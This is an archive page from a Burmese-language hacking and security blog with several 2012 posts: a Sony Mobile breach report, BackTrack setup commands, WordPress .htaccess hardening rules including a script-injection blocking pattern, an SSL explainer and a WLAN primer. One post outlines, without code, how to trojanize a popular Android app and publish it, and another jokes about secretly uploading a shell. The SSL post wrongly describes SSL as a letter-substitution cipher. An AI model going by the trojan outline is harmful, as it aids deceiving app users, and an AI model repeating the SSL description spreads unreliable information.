Showing posts with label knowledge. Show all posts
Showing posts with label knowledge. Show all posts

Sunday, September 2, 2012

Sony Mobile website hacked by NullCrew


ယခုနှစ်အတွင်း နောက်ထပ်တစ်ကြိမ် အဖြစ် Sony Mobile website သည်နောက်ထပ်တစ်ကြိမ် အဖြစ် တိုက် ခိုက်ခံခဲ့ရပါတယ်...။ www.sonymobile.com သည် Hacker Group တစ်ခုဖြစ်သော Null Crew အဖွဲ့ မှတိုက် ခိုက်ချင်ကိုခံခဲ့ရပြီး user အများစုရဲ့ အချက်အလက်များကို ဖွင့်ချဖော်ထုတ် ခဲ့ပါတယ်...။ဒီသတင်းအချက် အလက်ကိုလဲ တိုက်ခိုက်သူများဖြစ်တဲ့ Null Crew ရဲ့ twitter account ထဲမှာဖော်ပြခဲ့ခြင်းဖြစ်ပါတယ်...။

သူတို့ဟာ ထွင်းဖေါက် ရယူထားသောသတင်းအချက် အလက် အစုအစည်းများကို Pastebin တွင်လဲ ဖော်ပြ ထားပြီး အောက်ပါ  သတိပေးစာကို ဖော်ပြခဲ့ပါတယ်....။

Stats of Dumps

  • 441 ယောက်သော အသုံးပြုသူများ၏ username များ email အကောင့်များ×××××
  • Think_users Table မှ 24 ယောက်သော user များ၏ Hash passwords များပါသွားခြင်း××××
  • admin_users Table မှ 3 ယောက်သော Admin များ၏ အချက်အလက်များပါဝင်သွားခြင်း×××××

တို့ပဲဖြစ်ကြပါတယ်...။

ref: http://thehackernews.com
post by shwekoyantaw
Read More ->>

Saturday, September 1, 2012

ဝိကိလိခ် ၏ အတွင်းရေးများ ( အပိုင်း ၁ မှ ၇ ) ထိ


ဝိကိလိခ်၏ အတွင်းရေးများ ဆိုတဲ့ စာအုပ်ကို MCM မှ ကို Giacomo က ဘာသာပြန်ပြီး တင်ပေးထားတာဖြစ်ပါတယ် ။ ဒီလိုစာအုပ်မျိုးကို ဘာသာပြန်ပြီး တင်ပေးဖို့ဆိုတာ တော်တော် အားထည့်မှ ရတဲ့ အလုပ်တစ်ခုပါ ... အခန်း ( ၂၁ ) ခန်းရှိတာ ခုက ( ၁ ) ကနေ (၇ ) ထိပါ အခန်း ( ၈ ) တော့ ပြီးနေပြီလို့ ပြောပါတယ် ။ တင်ထားတာတော့ မတွေ့မိသေးဘူး... စိတ်ဝင်စားဖို့လည်း ကောင်းသလို Internet Security နဲ့ ပက်သက်ပြီး ကမာကို ကိုင်လှုပ်ခဲ့တဲ့ လူတွေ ဖြစ်လို့ ပိုပြီး စိတ်ဝင်စားဖို့ ကောင်းပါတယ်

Download

http://www.mediafire.com/?y34ckt9u6hvujyq
 
ref:MHU 
Read More ->>

Sunday, August 26, 2012

Creating Andriod Trojan in 5 steps


Android Trojan လုပ်ပုံလုပ်နည်းအကြောင်းတစ်စေ့တစ်စောင်းပြောကြည့်ရအောင်။ Trojan ဆိုတာကတော့ သိတဲ့အတိုင်းပဲ အစဉ်အလာနဲ့နေလာတာဆိုတော့ android os ပေါ်လာချိန်မှာသူလဲ တစ်ခေတ်ထနေပြန်ရဲ့။ အဲ့trojan တွေ ဘယ်လိုဝင်တာဆို တာတော့ ကိုယ်ပေးဝင်လို့ ဝင်တာပါပဲ။ ခင်ဗျားဖုန်းကို google က ကိစ္စအချို့ကို ဖယ်လိုက်လို့ သိပ်မအံသြပါနဲ့တဲ့။ malicious codeers တွေက Android အတွက် Trojan တွေရေးနိုင်ပါတယ်တဲ့ ။
ကဲထားပါတော့လေ။ဘယ်လိုလုပ်တယ်ဆိုတာလေးပဲပြောရအောင် :D
Technical Director for Security Reponse က Eric Chien က brand-new Trojan တစ်ကောင်ကို ပရိတ်သတ်ရှေ့မှာရိုးရှင်းသောနည်းတွေနဲ့ ရေးပြခဲ့ပါတယ်။ စိတ်မပူပါနဲ့ သူ sample app က အဲ့အခန်းထဲ မှာပဲရှိတာပါ။ တနည်းပြောရင် ဖျက်ပစ်လိုက်တယ်ပေါ့။ သူပုံစံအတိုင်းတစ်ခြားမြောက်များစွာသောအကောင်လေးတွေပဲ ထွက်လာတာ :D
ကဲ ခု Chien ရဲ့ ရိုးရှင်းတဲ့ငါးချက်ကိုပြောပါ့မယ်။
၁။ free app တစ်ခု download ဆွဲလိုက်ပါ။ လူကြိုက်များတဲ့တစ်ခုဆိုပိုကောင်းတာပေါ့။
၂။ PC နဲ့ Suit ဖြစ်မယ့် language compiler တစ်ခုနဲ့ source code ယူ ပြီးရင် CPU နားလည်တဲ့ assembly language ကိုပြောင်းလိုက်။ ဒီနည်းလမ်းတစ်လမ်းပဲရှိတယ် final executable file ကို source code ပြောင်းဖို့ဆိုတာ။ android app တွေက Java language နဲ့ရေးထားတာဆိုတော့ original source code ကို လွယ်ကူရိုးရှင်းတဲ့ tools တွေနဲ့ပြောင်းလို့ရပါတယ်။
၃။ ဒါကတော့နဲနဲလက်ဝင်တယ်လို့ပြောပါတယ်။ သုံးမယ့် app က user information တွေကို third party app တွေ ဆီေ၇ာက်အောင် သုံးလုပ်နိုင်မယ့် app တွေဆိုပိုကောင်းမယ်ဗျာ။ Chien ကတော့ demonstration မှာ Android.Geinimi ကို သုံးသွားပါတယ်။
၎။ Trojan code ထည့်တာကတော့ ရိုးရှင်းပါတယ်။ source code ရှိတဲ့ folder ထဲကို ထည့်မယ် ပြီးရင် Trojan code ကို တစ်ခြား app ထဲက code တွေထက် အရင် run အောင်နဲနဲချိန်းမယ်။ ပြီးရင် Trojanized app ကို device တစ်ခုလုံး ထိန်းချုပ်ခွင့်ရအောင် permission ပေးမယ်။ ပြီး ရင်တော့ အဲ့ app ကိုနာမည်ချိန်းလိုက်ပေါ့။ “FREE!!!!” လို့ပါရင် လူတိုင်းကြိုက်တယ်မလား။ (ဒါရေးပြီးရင် ဝယ်ပဲသုံးတော့မယ် app တွေကို :D )
၅။ အားလုံးပြီးသွားရင် တော့ modified app ကို compile လုပ်။ မပြောင်းလဲ ရှိတဲ့ market ပေါ်မှာ တင်လိုက်တော့။ ပြီးရင် ပြီးပြီ။
အခု လို Trojan မျိုးပါတဲ့ app ကို android Market က လက်မခံပါဘူးတဲ့။ လက်မခံလို့စိတ်မညစ်ပါနဲ့ တရုတ် ဖြစ် အောင်ကျင့်ကြံလိုက်။ China Market မှာသွားတင်လိုက်။ ကံကောင်းလို့ ကိုယ်ရေးတတ်ရင် တရုတ်မလှလှလေးတွေရဲ့ Photo လေးတွေရမှာနော်။ အဲ့ရကျင် အနော်ကို မမေ့နဲ့နော် :D
အကယ်လို့ tut အကုန်သိချင်ပါတယ်ဆိုလို့ရှိရင် The Hacker News က ထုတ်တဲ့ ၂၀၁၁ နိုဝင်ဘာလထုတ် မဂ္ဂဇင်းတွင် Demystifying the Android Malware ဆိုသောခေါင်းစဉ်ဖြင့် စာမျက်နှာ ၁၆ မှာပါရှိပါတယ်။ကျွန်တော် အဲ့ tutorial လုပ်ပြီးပါက မြန်မာလို တင်ပေးပါ့မယ်။ စာဖတ်သူအားလုံး ကိုယ်စိတ်နှစ်ဖြာကျန်းမာချမ်းသာကြပါစေ။

post by  Fortran
copy from Ghostarea.net
Read More ->>

Wednesday, July 4, 2012

Things need to do after installing Backtrack 5




BackTrack စသုံးပြီဆိုတာနဲ့ တွေ့လိုက်ရတဲ့ ပြဿနာပေါင်းသောင်းခြောက်ထောင်များ နှင့် သင့်ရာဆိုင်ရာများကို ဟိုဟိုဒီဒီမှ ရှာဖွေရင်း ဖော်ပြလိုက်ရပါသည်.။ Linux ဖြစ်၍ Beginner များအတွက် ခက်ခဲသည်က တစ်ကြောင်း Ubuntu လောက် User Friendly မဖြစ်တာကတစ်ကြောင်းကြောင့် စတင်သုံးစွဲသူများအဖို့ အခက်အခဲတွေတွေ့ရတတ်ပါတယ် ပထမဆုံးစက်ကိုစဖွင့်လိုက်ကာရှိသေး အသံမထွက်ဘူး ဖြစ်နေတတ်ပါတယ် :-D ဒီမှာကိုစကွိုင်ပါလေရော အဲ့ဒါလေးကိုပထမဆုံးပြင်လိုက်ရအောင် system>preferences>startup application ကိုအဆင့်ဆင့်သွားပြီးဖွင့်လိုက်ပါ နောက် ကျလာတဲ့ boxမှာ add ကိုနှိပ်ပါ ပြီးရင် စာကြောင်းဖြည့်ဖို့သုံလိုင်းကျလာပါမယ် အောက်ကကုဒ်တွေကိုတစ်ခုချင်းစီ ဖြည့်လိုက်ပါ……. Pulseaudio daemon /usr/bin/pulseaudio Start the sound daemon. ပြီးရင် save ကိုနှိပ်ပါ..နောက် restart ချလိုက်ပါ sound system ပြင်လို့ပြီးပါပြီ………. 2 .ပြီးရင် Wireless ချိတ်ဖို့လုပ်ကြရပါ့မယ် wireless ချိတ်ဖို့ wicd ကိုသွားရပါ့မယ် နောက် wicd network manger error ကိုပြင်မယ်ပေါ့… applications>internet>wicd network manger  ကို အဆင့်ဆင့်သွားဖွင့်လိုက်ပါ….error တက်နေတာကိုတွေ့ရပါလိမ့်မယ် . terminal ကိုဖွင့်လိုက်ပါ root account နဲ့ အောက်က Command နှစ်ကြောင်းရိုက်လိုက်ပါ dpkg-reconfigure wicd  update-rc.d wicd defaults  နောက်ထုံးစံအတိုင်း termianl ထဲမှာ ကိုယ့် Ip ကို manual အနေနဲ့ထည့်ပါမယ် ifconfig eth0 192.168.1.112/24 route add default gw 192.168.1.1 echo nameserver 192.168.1.1 > /etc/resolv.conf ip နေရာမှာကိုယ့် ip နဲ့ gw နေရာမှာ ကိုယ့် proxy ကိုထည့်နော်…. အဆင်ပြေပါစေ………. Basic software required in backtrack ခေါင်းစဉ်အတိုင်းပဲ အခြေခံအကျဆုံး software တွေကိုသွင်းပါမယ်…….

၁။ gtalk အတွက် empathy ကိုသွင်းပါမယ် empathy ဆိုတာ Gtalk အပြင် အခြားသော Facebook , Yahoo Mail , Hot Mail တို့ကိုပါ အသုံးပြုနိုင်သော Instant Messager ပါ . command line ကတော့ terminal ထဲမှာ apt-get install empathy ပေါ့ နော် U နဲ့ကွာတာဆိုလို့ sudo ပါတာနဲ့မပါတာပဲကွာတယ် အော်အေး အဲ့ sudo အကြောင်းနဲနဲလေရှည်လိုက်အုံးမယ် U မှာက သူက root အနေနဲ့အ၀င်ထားလို့ sudo ခံရတာပါ bt မှာက စ၀င်ကတည်းက root နဲ့ဝင်ထားလို့ ခံစရာမလိုတော့တာပါ တော်တော်များများသိမယ်လို့ထင်ပါတယ် သူ့ command တွေကအားလုံးလိုလိုတူပါတယ်..

၂။ flashplugin ကို Install လုပ်ပါမယ် ထုံးစံအတိုင်းပေါ့ apt-get install flashplugin-installer ဆိုရပါပြီ

၃။ Movie/Video player ကို install လုပ်ပါမယ် ကျွန်တော်စမ်းကြည့်သလောက်တော့ totem media player ကအကောင်းဆုံးပါပဲ bt နဲ့တည့်ပါတယ် ထုံးစံအတိုင်းပေါ့ apt-get install totem-gstreamer ပေါ့ သွင်းပြီးသွားရင် codec တွေကိုထပ်သွင်းရပါမယ် အမျိုးမျိုးသော Video ဖိုင်တွေကိုဖတ်အောင်လို့ပါ အောက်က ကုဒ်လေးကိုထပ်သွင်းလိုက်ပါ….. apt-get install ubuntu-restricted-extras apt-get install w32codecs apt-get install w32codecs libdvdcss2 ပြီးပါပြီ……..နောက်တစ်ခုပေါ့

၎။ အော်အရေးကြီးဆုံးတစ်ခုသွင်းဖို့ကျန်နေသေးတယ်……. ubuntu software centre လေ သွင်းတာပေါ့နော့် သူရှိရင်အားလုံး အဆင်ပြေတယ်လေ ထုံးစံအတိုင်းပေါ့ apt-get install software-center ပေါ့ ရပါပြီ အဲ့ဒါဆိုကိုယ်ကြိုက်တာထည့်လို့ရပါပြီ……..




 editing လုပ်ချင်တဲ့သူတွေအတွက် apt-get install pitivi ပေါ့ ၆။ တစ်ခါတစ်လေမှာ ကျွန်တော်တို့ CD ခွေတွေကိုဖွင့်ပါတယ် CD အတွက်အသင့်တော်ဆုံးကတော့ Rhythmbox ပါပဲ သွင်းရအောင် apt-get install rhythmbox ပေါ့ ဘယ်လောက်လွယ်လဲ ပျော်စရာကြီးနော် window လို software ၀ယ်ရတာနဲ့ crack/serial ထည့်ရတာတွေလုံးဝမရှိဘူး အားလုံး free ဟီးဟီး ပျော်လိုက်တာပြောရင်းနဲ့တောင် ပိုက်ပိုက်ကုန်တော့ဘူး…. တစ်ချို့လိုအပ်တဲ့ software တွေကို ubuntu software centre ကနေပဲသွင်းလိုက်ရင်အဆင်အားလုံးပြေသွားပါပြီ။ ၇.Zawgyi font install လုပ်နည်းလေးကြည့်ရအောင် ပထမဆုံး…….ဇော်ဂျီဖောင့်ကို အင်တာနက်ကနေ download ရယူပါ http://code.google.com/ မှာ zawgyi font tar file ဆိုပြီးရှာလိုက်ပါ နောက်ဆုံးထွက်တဲ့ဗားရှင်းကိုဒေါင်းလိုက်ပါ ဟီးဟီး desktop ပေါ်တင်ပါ tar file လေးနဲ့ကျလာပါမယ် tar file ကိုဖြေပါမယ် ပုံမှာကြည့်ပါ သုံးရမယ့်ကွန်မန့်တွေကတော့ cd Desktop/ Desktop ပေါ်ရောက်သွားပါပြီ နောက် ls ကိုပေးပါ zawgyi_keyboard-0.3.3.tar.gz ဆိုပေါ်လာပါမယ် ပုံမှာလဲပြထားပါတယ် tar file လေးကို extract လုပ်ပါမယ် tar xvf zawgyi_keyboard-0.3.3.tar.gz လို့ရိုက်လိုက်ပါ နောက် enter ပေါ့ ပြီးရင် ls နဲ့ပြန်ကြည့်ပါ ဇော်ဂျီဆိုတဲ့ဖိုင်လေး Desktop ပေါ်ရောက်နေပါလိမ့်မယ်


zawgyi ဆိုတဲ့အခန်းထဲကိုဝင်ပါ ပြီးရင် python နဲ့ run လိုက်ပါ python zawgyi_keyboard.py လို့ရိုက်လိုက်ပါ ပြီးရင် enter နှိပ်ပါ နောက် Install လုပ်ဖို့ i ကိုနှိပ်လိုက်ပါ install လုပ်ပြီးရင် q နဲ့ထွက်လိုက်ပါ ပုံမှာပြထားပါတယ်။








ပြီးသွားရင် keyboard layout နှင့် keyboard option ကိုပုံမှာပြထားတဲ့အတိုင်း ပြင်လိုက်ပါ 

Post by Aung Kyaw Moe
Source By Ghostarea.net
Read More ->>

Monday, July 2, 2012

What is SSL?



SSL ဆိုတာကတော့ Secure Socket Layer ကိုခေါ်တာပါ။
သူကဘာလဲဆိုတော့ User တစ်ယောက်ရိုက်ထည့်လိုက်တဲ့ Password တစ်ခုကို Encrypted လုပ်ပြီးတော့ Server ကိုပြန်ပို့ပါတယ်။ အဲဒီတော့ ကြားကနေ Password ကို Sniffing လုပ်မယ်ဆိုရင်တောင် Hacker ဟာ Encrypted လုပ်ထားတဲ့ Password ကိုပဲရသွားပါလိမ့်မယ်။ SSL သုံးထားတဲ့ ဆိုက်တွေရဲ့ Address ဟာ https:// နဲ့စပါတယ်။ အောက်ကဓါတ်ပုံလေးတွေကိုကြည့်ရအောင်။


ဒါကတော့ SSL သုံးမထားတဲ့ ပုံပါ။ ပုံမှာပါတဲ့အတိုင်း User က Server ဆီကို abc ဆိုတဲ့ Password တစ်ခုရိုက်လိုက်ပါတယ်။ ဒါကို Hacker ကကြားကနေ Sniffing လုပ်လိုက်တယ်ဆိုပါတော့။ ဒါဆိုရင် Hacker ဟာ abc ဆိုတဲ့ Password ကိုရသွားပါလိမ့်မယ်။ OK...နောက်တစ်ပုံကြည့်ပါ။

 

ဒါကတော့ SSL သုံးထားတဲ့ပုံပါ။ ဒီမှာကတော့ abc ဆိုတဲ့ Password ကို Encrypted လုပ်လိုက်ပါတယ်။ Encrypted Method အရ
a = z
b = y
c = x
ဆိုပြီး zyx လို့ပြောင်းလိုက်ပါတယ်။ ဒါကိုပဲ Hacker က Sniffing လုပ်ပါသေးတယ်။ ဒါပေမယ့် Hacker ရသွားတာက zyx ဆိုတဲ့ Password ဖြစ်သွားပါပြီ။
Hacker အနေနဲ့ ဒါကို Decrypted ပြန်လုပ်ဖို့ ထိုက်သင့်သလောက် အချိန်ယူရပါလိမ့်မယ်။ SSL ဆိုတာကတော့ ဒါပါပဲခင်ဗျာ။
credit:z3r0c00l

post by Dongoth
copy from mmhackforums.com
Read More ->>

Tuesday, June 26, 2012

[ secruity tips ] ဘလော့ security ပိုင်းဆိုင်ရာ ~!#



ဘယ်ကလဲတော့မသိတော့ဖူး ... tips နဲ့  anotepad ထဲမှာ မှတ်ထားတာလေး ပြန်ဆွဲထုတ်လာတာပါ ..

၁) Backup လုပ်ရန်
- ဘာပဲလုပ်လုပ် မဖြစ်မနေ စတင်ဆောင်ရွက်ရမည့် ကိစ္စကတော့ backup ဆိုတာ ဆိုက်ဒ်ထောင်တဲ့လူအများစုသိကြပါတယ်.....

၂) Update WordPress Version
- version မြင့်ပေးဖို့ ပါပဲ .. အသစ်ထွက်တဲ့ version တိုင်းဟာ အားနည်းချက်တွေ bugs တွေကို အတတ်နိုင်ဆုံးပြင်ဆင်ပြီး blogger တွေ စိုးရိမ်နေရတဲ့ ဟက်ခံရခြင်းမှ အတတ်နိုင်ဆုံးကာကွယ်ဖို့လည်း သူလည်း တစ်ချက်အပါအဝင်ပါပဲ
၃) Change your Login/Password
- မိမိဘလော့ရဲ့  အက်မင် လော့ဂျင် နာမည်နဲ့ pass ကို အတတ်နိုင်ဆုံး ခက်အောင်ထားထားပါ... ဥပမာ .. words+upper/lower keys+symbols+numbers ( ဥပမာဗျာ - biGb0ss!# ) .
- အက်မင် login ကိုလည်း ပြင်ဖို့ အရေးကြီးပါတယ်.. default အနေနဲ့ သတ်မှတ်ထားတဲ့ admin ဆိုတာကို လုံးဝကို ပြင်သင့်ပါတယ်... ဘာလို့ လဲဆိုတော့ ခုနောက်ပိုင်းမှာ wp brute attack ကို wordlist နဲ့ လုပ်လာကြတာတွေ တွေ့ လာရပါတယ်.. admin default သာဖြစ်နေမယ်ဆို admin လို့ ခန့် မှန်းပီး wordlist နဲ့  brute တိုက်ချသွားလို့ ကတော့ ကိုယ့် blog security ကောင်းလှပါချည်ရဲ့ ဆိုတာတောင် ဘာ bugs မှမရှိပဲ ဟက်ခံရနိုင်ပါတယ်...

၎) WordPress Keys in wp-config.php
- ဒီ keys တွေကတော့ data encrypt လုပ်တဲ့နေရာမှာ salt အနေဲ့ ပါဝင်တဲ့ အတွက် ဒါလည်း security measures တစ်ခုအနေနဲ့  ထည့်ပီးပြင်ဆင်သင့်ပါတယ်.. ( ဒီ key တွေပြင်ချင်တယ်ဆိုရင်တော့ ဘယ်လိုပြင်ရတယ်ဆိုတာ နားလည်အောင်အရင်ကြည့်သင့်ပါတယ်.. config ဖိုင်နေရာမှာ ယူထားတယ်ဆိုကတည်းက သူ့ ဟာ အရေးကြီးတယ်ဆိုတာ သိသာပါတယ်..)
ဥပမာ.

define(‘AUTH_KEY’, ‘put your unique phrase here’);
define(‘SECURE_AUTH_KEY’, ‘put your unique phrase here’);
define(‘LOGGED_IN_KEY’, ‘put your unique phrase here’);
define(‘NONCE_KEY’, ‘put your unique phrase here’);
https://api.wordpress.org/secret-key/1.1/

၅ ) Install WP Security Scan



ဒီ plugin လေးလည်း သွင်းထားဖို့ ပါပါတယ်.. သူက မိမိ blog ရဲ့  vulnerabilities တွေ malicious codes တွေကို automated stuff အနေဲ့  scan မှာပါ.. အပေါ်ဆုံမှာပြတဲ့အတိုင်း အစိမ်းရောင်လေးတွေပဲဆို အိုကေပါတယ်...

၆) Change Table Prefix




ဒီ table prefix ကိုလည်းပြင်သင့်ပါတယ်.. default က wp- ပါ ... SQL ပေါက်တယ်ဆိုတာတောင်မှ wp table prefix လေးပြင်ထားရင် ဖောက်တဲ့သူကို အခက်တွေ့ စေမှာဖြစ်ပါတယ်. အပေါ်မှာ ပြထားတဲ့ wp security scan plugin လေးနဲ့  အလွယ်တကူပြောင်းနိုင်ပါတယ်..

၇) Prevent WordPress Hack by Blocking Search Engine Spiders from Indexing the Admin Section
ဒါလေးကတော့ search engine တွေရဲ့  bot တွေက နေ့စဉ်နဲ့ အမျှ crawl လုပ်နေမှာပါ ... ကိုယ်က permission မပိတ်မှရမှာ.. နို့ မို့ ဆို admin section ပါ crawl လုပ်နေလိမ့်မယ်.. ဒါလေးကို ကာကွယ်ဖို့  disable indexing from crawler လုပ်ဖို့  မိမိ panel ရဲ့  (cpanel ကိုဆိုလိုတာပါ.. admin section မဟုတ်ပါ) ရဲ့  root directory မှာ robot.txt ဖိုင်လေးဆောက်ပီးကာကွယ်ရပါမယ်.. အောက်မှာ..

#
User-agent: *
Disallow: /cgi-bin
Disallow: /wp-admin
Disallow: /wp-includes
Disallow: /wp-content/plugins/
Disallow: /wp-content/cache/
Disallow: /wp-content/themes/
Disallow: */trackback/
Disallow: */feed/
Disallow: /*/feed/rss/$
Disallow: /category/*

၈) htaccess Hacks
ဒီ hypertext access ကလည်း directroy level file တွေကို ထိန်းချုပ်တဲ့ အရေးကြီးတဲ့ ဖိုင်တစ်မျိုးပါ .. ဒါလေးကိုများသောအားဇြင့်တော့ web root folder မှာထားကြပါတယ်.. /home/user/public_html အောက်မှာထားကြပါတယ် များသောအားဖြင့် .. ကျနော်တို့  symlink လုပ်တဲ့အခါ .. .htaccess ဖိုင်ကလည်း indexing လုပ်ဖို့  တအပ်တအားပါတယ်ဆိုတာ .. hacker တွေသိကြတယ်မလား ... Posted Image
ဒီဖိုင်လေး အလုပ်လုပ်ပုံကိုသေချာသိမှာ ပြင်ဆင်ကြပါ.. မဟုတ်ရင် ဆိုက်ဒ်ပါကျသွားနိုင်ပါတယ်.. panel ထဲကဝင်ပြင်နေရမယ်.. panel မရှိရင်တော့ သေပီဆရာပဲ Posted Image ( shell လေးမသိမသာခိုးတင်ထားပေါ့ ဟိ . ဟိ ... panel မရှိရင် ) အယ်... security ကနေ သူခိုးဘက် ရောက်ကုန်ပီ Posted Image Posted Image
http://mmdongoth.net...ccess/index.php

၉) Protect your htaccess
htaccess ကိုလည်း ကာကွယ်ထားဖို့ အောက်ကကုဒ်လေးတွေ ထည့်ထားးသင့်ပါတယ်.. ( warning : htaccess ဖိုင်ကို မသေချာပဲ မသုံးကြပါနဲ့ .. ဆိုက်ဒ်အတက်အကျက သူ့ ပေါ်မှာလဲ မူတည်နေတယ် .. သုံးတာမှားရင်ဆိုက်ဒ် ဒေါင်းသွားနိုင်ပါတယ် )

# STRONG HTACCESS PROTECTION</code>
<Files ~ "^.*\.([Hh][Tt][Aa])">
order allow,deny
deny from all
satisfy all
</Files>

၁၀ ) No Directory Browsing
- အကောင်းဆုံးကတော့ ဘယ် directory မှာ browsing မပေးထားတာအကောင်းဆုံးပဲ .. ဒါလေးနှစ်ကြောင်းလောက် .htaccess ထဲထည့်ထားပေါ့

# disable directory browsing
Options All -Indexes

၁၁) Secure wp-config.php
- ဆိုက်ဒ်ကို online တင်ပေးတာ wp-config.php ဖိုင်ပါ. hacker တွေက ဒီဖိုင်ကနေ code တွေရယူပီး ဆိုက်ဒ်ကို ထိုးဖောက်ဝင်ရောက်ကြပါတယ်.. ဒါကြောင့် အဲ့ဖိုင်ကို ကာကွယ်ဖို့ လဲ .htacess ထဲမှာ ဒီ code ကိုထည့်ထားသင့်ပါတယ်

# protect wp-config.php
<files wp-config.php>
Order deny,allow
Deny from all
</files>
The code denies access to the wp-config.php file to everyone!

၁၂) Limit Access to the Wp-Content Directory
- wp-content dir ကိုလည်းကာကွယ်ဖို့  .htaccess ထဲမှာ

Order deny,allow
Deny from all
<Files ~ “.(xml|css|jpe?g|png|gif|js)$”>
Allow from all
</Files>

ဖြည့်ပါ.

၁၃) Protect WordPress Admin Files
- wp-admin ဖိုင်ကို တခြားလူ access မ၇အောင် ဒီကုဒ်နဲ့ ကာထားပါ .. .htaccess ထဲမှာ

# deny access to wp admin
order deny,allow
allow from xx.xx.xx.xx # This is your static IP
deny from all

ကြည့်လိုက်ရင်သိသာပါတယ်.. xx.xx.xx.xx IP မဟုတ်ရင် browsing လုပ်ခွင့်မရပါဖူး ..

၁၄) Prevent script injection

ဒါလေးကို ပြည့်စုံအောင် http://www.wprecipes...access]ဒီမှာဖတ် လည်းရပါတယ်
Simple copy and paste the code below to your htaccess in the root
# protect from sql injection
Options +FollowSymLinks
RewriteEngine On
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
RewriteRule ^(.*)$ index.php [F,L]

BONUS အနေနဲ့  http://wordpress.org/extend/plugins/wordpress-firewall-2/ wp firewall plugins လည်းရှိပါတယ်.. ဒါပေမယ့် ဒါကလည်း တခါတလေ ကိုယ့် acttion ကိုတောင် block တတ်ပါသတဲ့ ဒါကြောင့် စူပါ ဟက်ကာတွေ စူပါ bot တွေလာနိုင်မယ်ဆိုမှ သုံးကြပါ .. Posted Image

အပြည့်အစုံတော့ မဟုတ်ပေမယ့် ဒီလောက်နဲ့ ဆိုလည်း security ကောင်းနိုင်မယ်ထင်ပါတယ်.. But there's no 100% security လို့ တော့ ကျနော်ကတော့ ခံယူထားပါတယ် Posted Image
နောက်ထပ်ကောင်းမယ်ထင်တာရှိရင် ထပ်ဖြည့်ပေးကြပေါ့...

ခရက်တစ်=ကိုတုတ်ကောက်
Copy from : http://mmhackforums.com//index.php?/topic/291-secruity-tips-%E1%80%98%E1%80%B1%E1%80%9C%E1%80%AC%E1%80%B7-security-%E1%80%95%E1%80%AD%E1%80%AF%E1%80%84%E1%80%B9%E1%80%B8%E1%80%86%E1%80%AD%E1%80%AF%E1%80%84%E1%80%B9%E1%80%9B%E1%80%AC/page__pid__699#entry699


Read More ->>

Monday, June 25, 2012

Wireless Local Area Network



ပထမဆုံးမိတ်ဆက် ပို့စ်လေး အနေနဲ့ ဘောစိလည်းရေးခိုင်းတာနဲ့ WLAN အကြောင်းလေး အစပျိုးလိုက်ပါတယ် ။ ဟက်နည်းတွေကြီး လုပ်နေတာရော သီအိုရီ ရေးနဲ့ဆို ပိုပြီး ထိရောက်မယ် ယူဆလို့ တင်လိုက်ပါတယ်ဗျာ ။

Wireless Network ချိတ်ဆက်မည်ဆိုပါက အောက်ပါနည်းလမ်းနှစ်သွယ်ဖြင့်ချိတ်ဆက်နိုင် ပါသည်။ ယင်းတို့မှာ -
၁ ) Ad.hoc Mode
၂) Infrastructure Mode
ဟူ၍ဖြစ်ပါသည်။

၁) Ad.hoc Mode (IBSS)
Ad.hoc အားတစ်နည်းအားဖြင့် Independent Basic Service Set ဟူ၍ လည်း ခေါ်ပါသည်။ယင်း Ad.hoc Mode သည် Computer အချင်းချင်း Wireless Adpater တမျိုးတည်း ဖြင့်သာအသုံးပြုချိတ်ဆက်ခြင်းဖြစ်ပါသည်။ ထို့ချိတ်ဆက်မှုတွင်မည်သည့်ကြားခံပစ္စည်း မှမလိုအပ်ပါ။



၂) Infrastructure Mode(BSS)
Infrastructure Mode အားတစ်နည်းအားဖြင့် Basic Service Set ဟူ၍လည်းခေါ်ပါ သည်။။ယင်း Infrastructure Mode သည် Computer အချင်းချင်းချိတ်ဆက်ရာတွင်း Wireless Adpater နှင့် Wireless Access Point (or) Wireless Router တို့ကို အသုံးပြုချိတ်ဆက်ခြင်း ဖြစ်ပါသည်။ ထို့ကြောင့် Wireless Adpater သည်အသုံးပြုသူများ၏ ရွေးချယ်မှု ပေးတွင် မူတည်ပါသည် ။
 



Wi-Fi Technology
Wi-Fi ဆိုသည်မှာ Wireless Fidelity ဖြစ်ပါသည်။ Wifi သည် Wireless Local Area Network (WLAN) အတွက်အသုံးပြုသည့်နည်းပညာတစ်ခုဖြစ်ပါသည်။ယင်း Wifi သည် IEEE 802.11 Standard အားအခြေခံထားခြင်းဖြစ်ပါသည်။ Wifi သည် IEEE 802.11b Standard ဖြစ်သည့် Frequency 2.4GHz အားအသုံးပြုခဲ့သော်လည်း နောက်ပိုင်းတွင် IEEE 802.11 Standard များဖြစ်သည့် (802.11a,802.11b,802.11g,802.11n) Standards များတွင်ပါ အသုံးပြုနိုင်ပါသည်။ Wifi နည်းပညာသည် sender နှင့် receiver အကြား Physical Wire Connection ဖြင့်အလုပ်မလုပ်ဘဲ Radio Frequency ဖြင့်သာ Data များပေးပို့ခြင်းနှင့်လက်ခံ ခြင်းများပြုလုပ်ကြပါသည်။ RF Current များအား Antenna ဆီသို့ပေးပို့ပြီး ထိုမှတဆင့် Electromagnetic Field ဖန်တီးကာ လေဟာနယ်မှတဆင့် Propagate ပြုလုပ်ပေးခြင်းပင်ဖြစ်ပါ သည်။ ထိုသို့ RF အားအသုံးပြုပြီး Data များပေးပို့လက်ခံရန်အတွက် မည်သည့် Wifi Network မဆို Access Point လိုအပ်မည်ဖြစ်ပါသည်။ Access Point သည် Infrastructure Mode အတွက်အသုံးပြုသောကြားခံပစ္စည်းတစ်ခု ဖြစ်ပါသည်။ Wireless Network အတွင်း wireless client များအပြန်အလှန်ချိတ်ဆက်မိစေရန် အတွက်အသုံးပြုသော ပစ္စည်းဖြစ်သည်။ယင်း Access Point တွင်အောက်ဖော်ပြပါ Mode (၃) ခုပါ ဝင်ပါသည်-

၁) Root Mode
၂) Repeater Mode
၃) Bridge Mode တို့ဖြစ်ပါသည်။

၁) Root Mode
Root Mode ဆိုသည်မှာယင်း Access Point မှတဆင့် Wire Network သို့ချိတ်ဆက် ခြင်းဖြစ်သည်။ Access Point မှ Wire Network သို့ချိတ်ဆက်ရာတွင် ယင်း Access Point တွင် ပါရှိသည့် Ethernet Interface ဖြင့်တိုက်ရိုက်ချိတ်ဆက်ပါသည်။

၂ ) Repeater Mode
